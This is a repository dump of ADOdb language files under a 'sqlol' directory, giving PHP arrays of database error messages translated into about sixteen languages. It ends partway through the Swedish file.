/sqlol/includes/adodb/lang/adodb-cn.inc.php: -------------------------------------------------------------------------------- 1 | 'cn', 6 | DB_ERROR => '未知错误', 7 | DB_ERROR_ALREADY_EXISTS => '已经存在', 8 | DB_ERROR_CANNOT_CREATE => '不能创建', 9 | DB_ERROR_CANNOT_DELETE => '不能删除', 10 | DB_ERROR_CANNOT_DROP => '不能丢弃', 11 | DB_ERROR_CONSTRAINT => '约束限制', 
12 | DB_ERROR_DIVZERO => '被0除', 13 | DB_ERROR_INVALID => '无效', 14 | DB_ERROR_INVALID_DATE => '无效的日期或者时间', 15 | DB_ERROR_INVALID_NUMBER => '无效的数字', 16 | DB_ERROR_MISMATCH => '不匹配', 17 | DB_ERROR_NODBSELECTED => '没有数据库被选择', 18 | DB_ERROR_NOSUCHFIELD => '没有相应的字段', 19 | DB_ERROR_NOSUCHTABLE => '没有相应的表', 20 | DB_ERROR_NOT_CAPABLE => '数据库后台不兼容', 21 | DB_ERROR_NOT_FOUND => '没有发现', 22 | DB_ERROR_NOT_LOCKED => '没有被锁定', 23 | DB_ERROR_SYNTAX => '语法错误', 24 | DB_ERROR_UNSUPPORTED => '不支持', 25 | DB_ERROR_VALUE_COUNT_ON_ROW => '在行上累计值', 26 | DB_ERROR_INVALID_DSN => '无效的数据源 (DSN)', 27 | DB_ERROR_CONNECT_FAILED => '连接失败', 28 | 0 => '没有错误', // DB_OK 29 | DB_ERROR_NEED_MORE_DATA => '提供的数据不能符合要求', 30 | DB_ERROR_EXTENSION_NOT_FOUND=> '扩展没有被发现', 31 | DB_ERROR_NOSUCHDB => '没有相应的数据库', 32 | DB_ERROR_ACCESS_VIOLATION => '没有合适的权限' 33 | ); 34 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-cz.inc.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | $ADODB_LANG_ARRAY = array ( 7 | 'LANG' => 'cz', 8 | DB_ERROR => 'neznámá chyba', 9 | DB_ERROR_ALREADY_EXISTS => 'ji? 
existuje', 10 | DB_ERROR_CANNOT_CREATE => 'nelze vytvo?it', 11 | DB_ERROR_CANNOT_DELETE => 'nelze smazat', 12 | DB_ERROR_CANNOT_DROP => 'nelze odstranit', 13 | DB_ERROR_CONSTRAINT => 'poru?ení omezující podmínky', 14 | DB_ERROR_DIVZERO => 'd?lení nulou', 15 | DB_ERROR_INVALID => 'neplatné', 16 | DB_ERROR_INVALID_DATE => 'neplatné datum nebo ?as', 17 | DB_ERROR_INVALID_NUMBER => 'neplatné ?íslo', 18 | DB_ERROR_MISMATCH => 'nesouhlasí', 19 | DB_ERROR_NODBSELECTED => '?ádná databáze není vybrána', 20 | DB_ERROR_NOSUCHFIELD => 'pole nenalezeno', 21 | DB_ERROR_NOSUCHTABLE => 'tabulka nenalezena', 22 | DB_ERROR_NOT_CAPABLE => 'nepodporováno', 23 | DB_ERROR_NOT_FOUND => 'nenalezeno', 24 | DB_ERROR_NOT_LOCKED => 'nezam?eno', 25 | DB_ERROR_SYNTAX => 'syntaktická chyba', 26 | DB_ERROR_UNSUPPORTED => 'nepodporováno', 27 | DB_ERROR_VALUE_COUNT_ON_ROW => '', 28 | DB_ERROR_INVALID_DSN => 'neplatné DSN', 29 | DB_ERROR_CONNECT_FAILED => 'p?ipojení selhalo', 30 | 0 => 'bez chyb', // DB_OK 31 | DB_ERROR_NEED_MORE_DATA => 'málo zdrojových dat', 32 | DB_ERROR_EXTENSION_NOT_FOUND=> 'roz?í?ení nenalezeno', 33 | DB_ERROR_NOSUCHDB => 'databáze neexistuje', 34 | DB_ERROR_ACCESS_VIOLATION => 'nedostate?ná práva' 35 | ); 36 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-da.inc.php: -------------------------------------------------------------------------------- 1 | 'da', 5 | DB_ERROR => 'ukendt fejl', 6 | DB_ERROR_ALREADY_EXISTS => 'eksisterer allerede', 7 | DB_ERROR_CANNOT_CREATE => 'kan ikke oprette', 8 | DB_ERROR_CANNOT_DELETE => 'kan ikke slette', 9 | DB_ERROR_CANNOT_DROP => 'kan ikke droppe', 10 | DB_ERROR_CONSTRAINT => 'begrænsning krænket', 11 | DB_ERROR_DIVZERO => 'division med nul', 12 | DB_ERROR_INVALID => 'ugyldig', 13 | DB_ERROR_INVALID_DATE => 'ugyldig dato eller klokkeslet', 14 | DB_ERROR_INVALID_NUMBER => 'ugyldigt tal', 15 | DB_ERROR_MISMATCH => 'mismatch', 16 | DB_ERROR_NODBSELECTED => 'ingen database 
valgt', 17 | DB_ERROR_NOSUCHFIELD => 'felt findes ikke', 18 | DB_ERROR_NOSUCHTABLE => 'tabel findes ikke', 19 | DB_ERROR_NOT_CAPABLE => 'DB backend opgav', 20 | DB_ERROR_NOT_FOUND => 'ikke fundet', 21 | DB_ERROR_NOT_LOCKED => 'ikke låst', 22 | DB_ERROR_SYNTAX => 'syntaksfejl', 23 | DB_ERROR_UNSUPPORTED => 'ikke understøttet', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'resulterende antal felter svarer ikke til forespørgslens antal felter', 25 | DB_ERROR_INVALID_DSN => 'ugyldig DSN', 26 | DB_ERROR_CONNECT_FAILED => 'tilslutning mislykkedes', 27 | 0 => 'ingen fejl', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'utilstrækkelige data angivet', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'udvidelse ikke fundet', 30 | DB_ERROR_NOSUCHDB => 'database ikke fundet', 31 | DB_ERROR_ACCESS_VIOLATION => 'utilstrækkelige rettigheder' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-en.inc.php: -------------------------------------------------------------------------------- 1 | 'en', 5 | DB_ERROR => 'unknown error', 6 | DB_ERROR_ALREADY_EXISTS => 'already exists', 7 | DB_ERROR_CANNOT_CREATE => 'can not create', 8 | DB_ERROR_CANNOT_DELETE => 'can not delete', 9 | DB_ERROR_CANNOT_DROP => 'can not drop', 10 | DB_ERROR_CONSTRAINT => 'constraint violation', 11 | DB_ERROR_DIVZERO => 'division by zero', 12 | DB_ERROR_INVALID => 'invalid', 13 | DB_ERROR_INVALID_DATE => 'invalid date or time', 14 | DB_ERROR_INVALID_NUMBER => 'invalid number', 15 | DB_ERROR_MISMATCH => 'mismatch', 16 | DB_ERROR_NODBSELECTED => 'no database selected', 17 | DB_ERROR_NOSUCHFIELD => 'no such field', 18 | DB_ERROR_NOSUCHTABLE => 'no such table', 19 | DB_ERROR_NOT_CAPABLE => 'DB backend not capable', 20 | DB_ERROR_NOT_FOUND => 'not found', 21 | DB_ERROR_NOT_LOCKED => 'not locked', 22 | DB_ERROR_SYNTAX => 'syntax error', 23 | DB_ERROR_UNSUPPORTED => 'not supported', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'value count on row', 25 | DB_ERROR_INVALID_DSN => 
'invalid DSN', 26 | DB_ERROR_CONNECT_FAILED => 'connect failed', 27 | 0 => 'no error', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'insufficient data supplied', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extension not found', 30 | DB_ERROR_NOSUCHDB => 'no such database', 31 | DB_ERROR_ACCESS_VIOLATION => 'insufficient permissions', 32 | DB_ERROR_DEADLOCK => 'deadlock detected', 33 | DB_ERROR_STATEMENT_TIMEOUT => 'statement timeout', 34 | DB_ERROR_SERIALIZATION_FAILURE => 'could not serialize access' 35 | ); 36 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-eo.inc.php: -------------------------------------------------------------------------------- 1 | 'eo', 7 | DB_ERROR => 'nekonata eraro', 8 | DB_ERROR_ALREADY_EXISTS => 'jam ekzistas', 9 | DB_ERROR_CANNOT_CREATE => 'maleblas krei', 10 | DB_ERROR_CANNOT_DELETE => 'maleblas elimini', 11 | DB_ERROR_CANNOT_DROP => 'maleblas elimini (drop)', 12 | DB_ERROR_CONSTRAINT => 'rompo de kondiĉoj de provo', 13 | DB_ERROR_DIVZERO => 'divido per 0 (nul)', 14 | DB_ERROR_INVALID => 'malregule', 15 | DB_ERROR_INVALID_DATE => 'malregula dato kaj tempo', 16 | DB_ERROR_INVALID_NUMBER => 'malregula nombro', 17 | DB_ERROR_MISMATCH => 'eraro', 18 | DB_ERROR_NODBSELECTED => 'datumbazo ne elektita', 19 | DB_ERROR_NOSUCHFIELD => 'ne ekzistas kampo', 20 | DB_ERROR_NOSUCHTABLE => 'ne ekzistas tabelo', 21 | DB_ERROR_NOT_CAPABLE => 'DBMS ne povas', 22 | DB_ERROR_NOT_FOUND => 'ne trovita', 23 | DB_ERROR_NOT_LOCKED => 'ne blokita', 24 | DB_ERROR_SYNTAX => 'sintaksa eraro', 25 | DB_ERROR_UNSUPPORTED => 'ne apogata', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'nombrilo de valoroj en linio', 27 | DB_ERROR_INVALID_DSN => 'malregula DSN-o', 28 | DB_ERROR_CONNECT_FAILED => 'konekto malsukcesa', 29 | 0 => 'ĉio bone', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'ne sufiĉe da datumo', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'etendo ne trovita', 32 | DB_ERROR_NOSUCHDB => 'datumbazo ne ekzistas', 33 | 
DB_ERROR_ACCESS_VIOLATION => 'ne sufiĉe da rajto por atingo' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-es.inc.php: -------------------------------------------------------------------------------- 1 | 3 | $ADODB_LANG_ARRAY = array ( 4 | 'LANG' => 'es', 5 | DB_ERROR => 'error desconocido', 6 | DB_ERROR_ALREADY_EXISTS => 'ya existe', 7 | DB_ERROR_CANNOT_CREATE => 'imposible crear', 8 | DB_ERROR_CANNOT_DELETE => 'imposible borrar', 9 | DB_ERROR_CANNOT_DROP => 'imposible hacer drop', 10 | DB_ERROR_CONSTRAINT => 'violacion de constraint', 11 | DB_ERROR_DIVZERO => 'division por cero', 12 | DB_ERROR_INVALID => 'invalido', 13 | DB_ERROR_INVALID_DATE => 'fecha u hora invalida', 14 | DB_ERROR_INVALID_NUMBER => 'numero invalido', 15 | DB_ERROR_MISMATCH => 'error', 16 | DB_ERROR_NODBSELECTED => 'no hay base de datos seleccionada', 17 | DB_ERROR_NOSUCHFIELD => 'campo invalido', 18 | DB_ERROR_NOSUCHTABLE => 'tabla no existe', 19 | DB_ERROR_NOT_CAPABLE => 'capacidad invalida para esta DB', 20 | DB_ERROR_NOT_FOUND => 'no encontrado', 21 | DB_ERROR_NOT_LOCKED => 'no bloqueado', 22 | DB_ERROR_SYNTAX => 'error de sintaxis', 23 | DB_ERROR_UNSUPPORTED => 'no soportado', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'la cantidad de columnas no corresponden a la cantidad de valores', 25 | DB_ERROR_INVALID_DSN => 'DSN invalido', 26 | DB_ERROR_CONNECT_FAILED => 'fallo la conexion', 27 | 0 => 'sin error', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'insuficientes datos', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extension no encontrada', 30 | DB_ERROR_NOSUCHDB => 'base de datos no encontrada', 31 | DB_ERROR_ACCESS_VIOLATION => 'permisos insuficientes' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-fa.inc.php: -------------------------------------------------------------------------------- 1 | */ 4 | 5 | $ADODB_LANG_ARRAY = array ( 6 | 'LANG' => 
'fa', 7 | DB_ERROR => 'خطای ناشناخته', 8 | DB_ERROR_ALREADY_EXISTS => 'وجود دارد', 9 | DB_ERROR_CANNOT_CREATE => 'امکان create وجود ندارد', 10 | DB_ERROR_CANNOT_DELETE => 'امکان حذف وجود ندارد', 11 | DB_ERROR_CANNOT_DROP => 'امکان drop وجود ندارد', 12 | DB_ERROR_CONSTRAINT => 'نقض شرط', 13 | DB_ERROR_DIVZERO => 'تقسیم بر صفر', 14 | DB_ERROR_INVALID => 'نامعتبر', 15 | DB_ERROR_INVALID_DATE => 'زمان یا تاریخ نامعتبر', 16 | DB_ERROR_INVALID_NUMBER => 'عدد نامعتبر', 17 | DB_ERROR_MISMATCH => 'عدم مطابقت', 18 | DB_ERROR_NODBSELECTED => 'بانک اطلاعاتی انتخاب نشده است', 19 | DB_ERROR_NOSUCHFIELD => 'چنین ستونی وجود ندارد', 20 | DB_ERROR_NOSUCHTABLE => 'چنین جدولی وجود ندارد', 21 | DB_ERROR_NOT_CAPABLE => 'backend بانک اطلاعاتی قادر نیست', 22 | DB_ERROR_NOT_FOUND => 'پیدا نشد', 23 | DB_ERROR_NOT_LOCKED => 'قفل نشده', 24 | DB_ERROR_SYNTAX => 'خطای دستوری', 25 | DB_ERROR_UNSUPPORTED => 'پشتیبانی نمی شود', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'شمارش مقادیر روی ردیف', 27 | DB_ERROR_INVALID_DSN => 'DSN نامعتبر', 28 | DB_ERROR_CONNECT_FAILED => 'ارتباط برقرار نشد', 29 | 0 => 'بدون خطا', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'داده ناکافی است', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extension پیدا نشد', 32 | DB_ERROR_NOSUCHDB => 'چنین بانک اطلاعاتی وجود ندارد', 33 | DB_ERROR_ACCESS_VIOLATION => 'حق دسترسی ناکافی' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-fr.inc.php: -------------------------------------------------------------------------------- 1 | 'fr', 5 | DB_ERROR => 'erreur inconnue', 6 | DB_ERROR_ALREADY_EXISTS => 'existe déjà', 7 | DB_ERROR_CANNOT_CREATE => 'création impossible', 8 | DB_ERROR_CANNOT_DELETE => 'effacement impossible', 9 | DB_ERROR_CANNOT_DROP => 'suppression impossible', 10 | DB_ERROR_CONSTRAINT => 'violation de contrainte', 11 | DB_ERROR_DIVZERO => 'division par zéro', 12 | DB_ERROR_INVALID => 'invalide', 13 | DB_ERROR_INVALID_DATE => 'date ou heure invalide', 14 | 
DB_ERROR_INVALID_NUMBER => 'nombre invalide', 15 | DB_ERROR_MISMATCH => 'erreur de concordance', 16 | DB_ERROR_NODBSELECTED => 'pas de base de données sélectionnée', 17 | DB_ERROR_NOSUCHFIELD => 'nom de colonne invalide', 18 | DB_ERROR_NOSUCHTABLE => 'table ou vue inexistante', 19 | DB_ERROR_NOT_CAPABLE => 'fonction optionnelle non installée', 20 | DB_ERROR_NOT_FOUND => 'pas trouvé', 21 | DB_ERROR_NOT_LOCKED => 'non verrouillé', 22 | DB_ERROR_SYNTAX => 'erreur de syntaxe', 23 | DB_ERROR_UNSUPPORTED => 'non supporté', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'valeur insérée trop grande pour colonne', 25 | DB_ERROR_INVALID_DSN => 'DSN invalide', 26 | DB_ERROR_CONNECT_FAILED => 'échec à la connexion', 27 | 0 => "pas d'erreur", // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'données fournies insuffisantes', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extension non trouvée', 30 | DB_ERROR_NOSUCHDB => 'base de données inconnue', 31 | DB_ERROR_ACCESS_VIOLATION => 'droits insuffisants' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-hu.inc.php: -------------------------------------------------------------------------------- 1 | 4 | $ADODB_LANG_ARRAY = array ( 5 | 'LANG' => 'hu', 6 | DB_ERROR => 'ismeretlen hiba', 7 | DB_ERROR_ALREADY_EXISTS => 'már létezik', 8 | DB_ERROR_CANNOT_CREATE => 'nem sikerült létrehozni', 9 | DB_ERROR_CANNOT_DELETE => 'nem sikerült törölni', 10 | DB_ERROR_CANNOT_DROP => 'nem sikerült eldobni', 11 | DB_ERROR_CONSTRAINT => 'szabályok megszegése', 12 | DB_ERROR_DIVZERO => 'osztás nullával', 13 | DB_ERROR_INVALID => 'érvénytelen', 14 | DB_ERROR_INVALID_DATE => 'érvénytelen dátum vagy idő', 15 | DB_ERROR_INVALID_NUMBER => 'érvénytelen szám', 16 | DB_ERROR_MISMATCH => 'nem megfelelő', 17 | DB_ERROR_NODBSELECTED => 'nincs kiválasztott adatbázis', 18 | DB_ERROR_NOSUCHFIELD => 'nincs ilyen mező', 19 | DB_ERROR_NOSUCHTABLE => 'nincs ilyen tábla', 20 | DB_ERROR_NOT_CAPABLE => 'DB backend nem 
támogatja', 21 | DB_ERROR_NOT_FOUND => 'nem található', 22 | DB_ERROR_NOT_LOCKED => 'nincs lezárva', 23 | DB_ERROR_SYNTAX => 'szintaktikai hiba', 24 | DB_ERROR_UNSUPPORTED => 'nem támogatott', 25 | DB_ERROR_VALUE_COUNT_ON_ROW => 'soron végzett érték számlálás', 26 | DB_ERROR_INVALID_DSN => 'hibás DSN', 27 | DB_ERROR_CONNECT_FAILED => 'sikertelen csatlakozás', 28 | 0 => 'nincs hiba', // DB_OK 29 | DB_ERROR_NEED_MORE_DATA => 'túl kevés az adat', 30 | DB_ERROR_EXTENSION_NOT_FOUND=> 'bővítmény nem található', 31 | DB_ERROR_NOSUCHDB => 'nincs ilyen adatbázis', 32 | DB_ERROR_ACCESS_VIOLATION => 'nincs jogosultság' 33 | ); 34 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-it.inc.php: -------------------------------------------------------------------------------- 1 | 'it', 6 | DB_ERROR => 'errore sconosciuto', 7 | DB_ERROR_ALREADY_EXISTS => 'esiste già', 8 | DB_ERROR_CANNOT_CREATE => 'non posso creare', 9 | DB_ERROR_CANNOT_DELETE => 'non posso cancellare', 10 | DB_ERROR_CANNOT_DROP => 'non posso eliminare', 11 | DB_ERROR_CONSTRAINT => 'violazione constraint', 12 | DB_ERROR_DIVZERO => 'divisione per zero', 13 | DB_ERROR_INVALID => 'non valido', 14 | DB_ERROR_INVALID_DATE => 'data od ora non valida', 15 | DB_ERROR_INVALID_NUMBER => 'numero non valido', 16 | DB_ERROR_MISMATCH => 'diversi', 17 | DB_ERROR_NODBSELECTED => 'nessun database selezionato', 18 | DB_ERROR_NOSUCHFIELD => 'nessun campo trovato', 19 | DB_ERROR_NOSUCHTABLE => 'nessuna tabella trovata', 20 | DB_ERROR_NOT_CAPABLE => 'DB backend non abilitato', 21 | DB_ERROR_NOT_FOUND => 'non trovato', 22 | DB_ERROR_NOT_LOCKED => 'non bloccato', 23 | DB_ERROR_SYNTAX => 'errore di sintassi', 24 | DB_ERROR_UNSUPPORTED => 'non supportato', 25 | DB_ERROR_VALUE_COUNT_ON_ROW => 'valore inserito troppo grande per una colonna', 26 | DB_ERROR_INVALID_DSN => 'DSN non valido', 27 | DB_ERROR_CONNECT_FAILED => 'connessione fallita', 28 | 0 => 'nessun errore', // DB_OK 
29 | DB_ERROR_NEED_MORE_DATA => 'dati inseriti insufficienti', 30 | DB_ERROR_EXTENSION_NOT_FOUND=> 'estensione non trovata', 31 | DB_ERROR_NOSUCHDB => 'database non trovato', 32 | DB_ERROR_ACCESS_VIOLATION => 'permessi insufficienti' 33 | ); 34 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-nl.inc.php: -------------------------------------------------------------------------------- 1 | 'nl', 5 | DB_ERROR => 'onbekende fout', 6 | DB_ERROR_ALREADY_EXISTS => 'bestaat al', 7 | DB_ERROR_CANNOT_CREATE => 'kan niet aanmaken', 8 | DB_ERROR_CANNOT_DELETE => 'kan niet wissen', 9 | DB_ERROR_CANNOT_DROP => 'kan niet verwijderen', 10 | DB_ERROR_CONSTRAINT => 'constraint overtreding', 11 | DB_ERROR_DIVZERO => 'poging tot delen door nul', 12 | DB_ERROR_INVALID => 'ongeldig', 13 | DB_ERROR_INVALID_DATE => 'ongeldige datum of tijd', 14 | DB_ERROR_INVALID_NUMBER => 'ongeldig nummer', 15 | DB_ERROR_MISMATCH => 'is incorrect', 16 | DB_ERROR_NODBSELECTED => 'geen database geselecteerd', 17 | DB_ERROR_NOSUCHFIELD => 'onbekend veld', 18 | DB_ERROR_NOSUCHTABLE => 'onbekende tabel', 19 | DB_ERROR_NOT_CAPABLE => 'database systeem is niet tot uitvoer in staat', 20 | DB_ERROR_NOT_FOUND => 'niet gevonden', 21 | DB_ERROR_NOT_LOCKED => 'niet vergrendeld', 22 | DB_ERROR_SYNTAX => 'syntaxis fout', 23 | DB_ERROR_UNSUPPORTED => 'niet ondersteund', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'waarde telling op rij', 25 | DB_ERROR_INVALID_DSN => 'ongeldige DSN', 26 | DB_ERROR_CONNECT_FAILED => 'connectie mislukt', 27 | 0 => 'geen fout', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'onvoldoende data gegeven', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extensie niet gevonden', 30 | DB_ERROR_NOSUCHDB => 'onbekende database', 31 | DB_ERROR_ACCESS_VIOLATION => 'onvoldoende rechten' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-pl.inc.php: 
-------------------------------------------------------------------------------- 1 | 4 | 5 | $ADODB_LANG_ARRAY = array ( 6 | 'LANG' => 'pl', 7 | DB_ERROR => 'niezidentyfikowany błąd', 8 | DB_ERROR_ALREADY_EXISTS => 'już istnieją', 9 | DB_ERROR_CANNOT_CREATE => 'nie można stworzyć', 10 | DB_ERROR_CANNOT_DELETE => 'nie można usunąć', 11 | DB_ERROR_CANNOT_DROP => 'nie można porzucić', 12 | DB_ERROR_CONSTRAINT => 'pogwałcenie uprawnień', 13 | DB_ERROR_DIVZERO => 'dzielenie przez zero', 14 | DB_ERROR_INVALID => 'błędny', 15 | DB_ERROR_INVALID_DATE => 'błędna godzina lub data', 16 | DB_ERROR_INVALID_NUMBER => 'błędny numer', 17 | DB_ERROR_MISMATCH => 'niedopasowanie', 18 | DB_ERROR_NODBSELECTED => 'baza danych nie została wybrana', 19 | DB_ERROR_NOSUCHFIELD => 'nie znaleziono pola', 20 | DB_ERROR_NOSUCHTABLE => 'nie znaleziono tabeli', 21 | DB_ERROR_NOT_CAPABLE => 'nie zdolny', 22 | DB_ERROR_NOT_FOUND => 'nie znaleziono', 23 | DB_ERROR_NOT_LOCKED => 'nie zakmnięty', 24 | DB_ERROR_SYNTAX => 'błąd składni', 25 | DB_ERROR_UNSUPPORTED => 'nie obsługuje', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'wartość liczona w szeregu', 27 | DB_ERROR_INVALID_DSN => 'błędny DSN', 28 | DB_ERROR_CONNECT_FAILED => 'połączenie nie zostało zrealizowane', 29 | 0 => 'brak błędów', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'niedostateczna ilość informacji', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'nie znaleziono rozszerzenia', 32 | DB_ERROR_NOSUCHDB => 'nie znaleziono bazy', 33 | DB_ERROR_ACCESS_VIOLATION => 'niedostateczne uprawnienia' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-pt-br.inc.php: -------------------------------------------------------------------------------- 1 | 'pt-br', 6 | DB_ERROR => 'erro desconhecido', 7 | DB_ERROR_ALREADY_EXISTS => 'já existe', 8 | DB_ERROR_CANNOT_CREATE => 'impossível criar', 9 | DB_ERROR_CANNOT_DELETE => 'impossível excluír', 10 | DB_ERROR_CANNOT_DROP => 'impossível remover', 11 | 
DB_ERROR_CONSTRAINT => 'violação do confinamente', 12 | DB_ERROR_DIVZERO => 'divisão por zero', 13 | DB_ERROR_INVALID => 'inválido', 14 | DB_ERROR_INVALID_DATE => 'data ou hora inválida', 15 | DB_ERROR_INVALID_NUMBER => 'número inválido', 16 | DB_ERROR_MISMATCH => 'erro', 17 | DB_ERROR_NODBSELECTED => 'nenhum banco de dados selecionado', 18 | DB_ERROR_NOSUCHFIELD => 'campo inválido', 19 | DB_ERROR_NOSUCHTABLE => 'tabela inexistente', 20 | DB_ERROR_NOT_CAPABLE => 'capacidade inválida para este BD', 21 | DB_ERROR_NOT_FOUND => 'não encontrado', 22 | DB_ERROR_NOT_LOCKED => 'não bloqueado', 23 | DB_ERROR_SYNTAX => 'erro de sintaxe', 24 | DB_ERROR_UNSUPPORTED => 25 | 'não suportado', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'a quantidade de colunas não corresponde ao de valores', 27 | DB_ERROR_INVALID_DSN => 'DSN inválido', 28 | DB_ERROR_CONNECT_FAILED => 'falha na conexão', 29 | 0 => 'sem erro', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'dados insuficientes', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extensão não encontrada', 32 | DB_ERROR_NOSUCHDB => 'banco de dados não encontrado', 33 | DB_ERROR_ACCESS_VIOLATION => 'permissão insuficiente' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-ro.inc.php: -------------------------------------------------------------------------------- 1 | */ 4 | 5 | $ADODB_LANG_ARRAY = array ( 6 | 'LANG' => 'ro', 7 | DB_ERROR => 'eroare necunoscuta', 8 | DB_ERROR_ALREADY_EXISTS => 'deja exista', 9 | DB_ERROR_CANNOT_CREATE => 'nu se poate creea', 10 | DB_ERROR_CANNOT_DELETE => 'nu se poate sterge', 11 | DB_ERROR_CANNOT_DROP => 'nu se poate executa drop', 12 | DB_ERROR_CONSTRAINT => 'violare de constrain', 13 | DB_ERROR_DIVZERO => 'se divide la zero', 14 | DB_ERROR_INVALID => 'invalid', 15 | DB_ERROR_INVALID_DATE => 'data sau timp invalide', 16 | DB_ERROR_INVALID_NUMBER => 'numar invalid', 17 | DB_ERROR_MISMATCH => 'nepotrivire-mismatch', 18 | DB_ERROR_NODBSELECTED => 'nu 
exista baza de date selectata', 19 | DB_ERROR_NOSUCHFIELD => 'camp inexistent', 20 | DB_ERROR_NOSUCHTABLE => 'tabela inexistenta', 21 | DB_ERROR_NOT_CAPABLE => 'functie optionala neinstalata', 22 | DB_ERROR_NOT_FOUND => 'negasit', 23 | DB_ERROR_NOT_LOCKED => 'neblocat', 24 | DB_ERROR_SYNTAX => 'eroare de sintaxa', 25 | DB_ERROR_UNSUPPORTED => 'nu e suportat', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'valoare prea mare pentru coloana', 27 | DB_ERROR_INVALID_DSN => 'DSN invalid', 28 | DB_ERROR_CONNECT_FAILED => 'conectare esuata', 29 | 0 => 'fara eroare', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'data introduse insuficiente', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extensie negasita', 32 | DB_ERROR_NOSUCHDB => 'nu exista baza de date', 33 | DB_ERROR_ACCESS_VIOLATION => 'permisiuni insuficiente' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-ru.inc.php: -------------------------------------------------------------------------------- 1 | 'ru', 7 | DB_ERROR => 'неизвестная ошибка', 8 | DB_ERROR_ALREADY_EXISTS => 'уже существует', 9 | DB_ERROR_CANNOT_CREATE => 'невозможно создать', 10 | DB_ERROR_CANNOT_DELETE => 'невозможно удалить', 11 | DB_ERROR_CANNOT_DROP => 'невозможно удалить (drop)', 12 | DB_ERROR_CONSTRAINT => 'нарушение условий проверки', 13 | DB_ERROR_DIVZERO => 'деление на 0', 14 | DB_ERROR_INVALID => 'неправильно', 15 | DB_ERROR_INVALID_DATE => 'некорректная дата или время', 16 | DB_ERROR_INVALID_NUMBER => 'некорректное число', 17 | DB_ERROR_MISMATCH => 'ошибка', 18 | DB_ERROR_NODBSELECTED => 'БД не выбрана', 19 | DB_ERROR_NOSUCHFIELD => 'не существует поле', 20 | DB_ERROR_NOSUCHTABLE => 'не существует таблица', 21 | DB_ERROR_NOT_CAPABLE => 'СУБД не в состоянии', 22 | DB_ERROR_NOT_FOUND => 'не найдено', 23 | DB_ERROR_NOT_LOCKED => 'не заблокировано', 24 | DB_ERROR_SYNTAX => 'синтаксическая ошибка', 25 | DB_ERROR_UNSUPPORTED => 'не поддерживается', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 
'счетчик значений в строке', 27 | DB_ERROR_INVALID_DSN => 'неправильная DSN', 28 | DB_ERROR_CONNECT_FAILED => 'соединение неуспешно', 29 | 0 => 'нет ошибки', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'предоставлено недостаточно данных', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'расширение не найдено', 32 | DB_ERROR_NOSUCHDB => 'не существует БД', 33 | DB_ERROR_ACCESS_VIOLATION => 'недостаточно прав доступа' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-sv.inc.php: -------------------------------------------------------------------------------- 1 | 'en', 5 | DB_ERROR => 'Okänt fel', 6 | DB_ERROR_ALREADY_EXISTS => 'finns redan', 7 | DB_ERROR_CANNOT_CREATE => 'kan inte skapa', 8 | DB_ERROR_CANNOT_DELETE => 'kan inte ta bort', 9 | DB_ERROR_CANNOT_DROP => 'kan inte släppa', 10 | DB_ERROR_CONSTRAINT => 'begränsning kränkt', 11 | DB_ERROR_DIVZERO => 'division med noll', 12 | DB_ERROR_INVALID => 'ogiltig', 13 | DB_ERROR_INVALID_DATE => 'ogiltigt datum eller tid', 14 | DB_ERROR_INVALID_NUMBER => 'ogiltigt tal', 15 | DB_ERROR_MISMATCH => 'felaktig matchning', 16 | DB_ERROR_NODBSELECTED => 'ingen databas vald', 17 | DB_ERROR_NOSUCHFIELD => 'inget sådant fält', 18 | DB_ERROR_NOSUCHTABLE => 'ingen sådan tabell', 19 | DB_ERROR_NOT_CAPABLE => 'DB backend klarar det inte', 20 